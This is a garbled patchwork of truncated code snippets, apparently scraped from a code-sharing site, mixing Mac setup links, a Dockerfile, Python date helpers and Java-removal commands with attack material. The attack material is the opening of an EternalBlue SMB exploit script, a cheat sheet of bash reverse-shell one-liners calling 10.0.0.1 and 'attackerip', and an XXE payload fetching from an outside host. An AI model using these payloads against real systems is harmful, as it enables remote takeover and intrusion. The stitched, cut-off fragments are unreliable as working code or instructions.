- Install Xcode - http://developer.apple.com/tools/xcode/
- Install PostgreSQL - http://www.enterprisedb.com/products-services-training/pgdownload#osx
PostgreSQL
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb, ntlm | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 8 and 2012 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
FROM python:2.7 | |
ENV VERSION 1.0.11 | |
RUN apt-get update && apt-get install -y \ | |
git --no-install-recommends | |
RUN mkdir /app | |
WORKDIR /app |
sudo rm -fr /Library/Java/JavaVirtualMachines/jdk-9.jdk/ | |
sudo rm -fr /Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin | |
sudo rm -fr /Library/PreferencePanes/JavaControlPanel.prefPane | |
#bash | |
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
#bash alt | |
exec /bin/bash 0&0 2>&0 | |
#bash alt 2 | |
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
#bash alt 3 |
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
PostgreSQL
import time | |
from datetime import datetime, date | |
# 今天 | |
datetime.datetime.today().date().isoformat() | |
# 通过日期对象生成时间戳 | |
int(time.mktime(datetime.now().timetuple())) | |
# 通过时间戳生成日期对象,timestamp 的时间戳以秒为单位 |